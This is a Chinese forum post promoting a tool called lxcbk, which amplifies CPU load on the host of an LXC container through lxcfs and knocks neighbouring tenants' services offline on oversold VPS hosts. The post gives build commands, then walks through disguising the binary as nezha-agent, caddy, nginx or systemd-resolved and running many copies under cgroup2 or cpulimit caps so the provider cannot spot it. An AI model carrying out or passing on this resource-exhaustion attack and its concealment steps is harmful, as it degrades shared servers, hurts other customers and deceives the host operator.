|
|
本帖最后由 LinusTorvalds 于 2024-9-10 00:34 编辑
源码仓库:https://github.com/oplxc/lxcbenchmark
下载:
- wget https://github.com/oplxc/lxcbenchmark/archive/refs/heads/main.zip
解压:
- unzip main.zip
- mv lxcbenchmark-main/* .
- make
- chmod +x lxcbk
实测线程调整为2有较高放大比例,不建议调整的过大。
直接运行
在自己pve机器下开出来的lxc测试,放大比例(lxcfs(占用):lxcbk(目标程序占用))确实将近5-10倍。
在lxc超售太猛的机器上更加有效,放大比例更加很大。都能看到邻居探针更猛烈的掉线和仰卧起坐。
lxcbk(炸鸡程序)实测可以改名。不要用默认的lxcbk名称,改为nezha-agent或者caddy之类的。然后lxcbk替换掉默认的/opt/nezha/agent/nezha-agent。并且也可使用 /opt/nezha/agent/nezha-agent -s xxxxx.com:443 -p xxxxxxx伪装启动。这样老板在母鸡上ps很难揪出你的程序。
不过为了防止更能被揪出来。建议不要只依赖启动一个程序,启动多个程序,同时每个程序只占用1%的cpu,这样老板就更难揪出来了。
实测使用lxcbk替换以下程序,/usr/local/bin/caddy,/usr/local/bin/xray,/lib/systemd/systemd-resolved,/sbin/nginx。
然后再使用cpu限制模式启动,鸡主很难发现。
可以用1%占用启动多个程序,这样就不容易被发现。
建议方法cgroup2限制,不容易发现:
- mkdir /sys/fs/cgroup/cgroupbk
- echo "1000 100000" | sudo tee /sys/fs/cgroup/cgroupbk/cpu.max
- setsid /usr/local/bin/caddy run &
- new_pid=$!
- echo $((new_pid + 1)) > /sys/fs/cgroup/cgroupbk/cgroup.procs
备用方法cpulimit,有发现风险:
- cpulimit --limit 1 -- /usr/local/bin/caddy run
/usr/local/bin/caddy是伪装的程序,实测lxcbk可以伪装为任何程序。然后启动多个不同名称的伪装程序实行炸鸡。
lxcbk对母鸡的放大比例能达到10倍,炸鸡程序占用1%,母鸡会占用10%左右。真的有效 |
|
发表于 2024-9-10 00:26:42
楼主
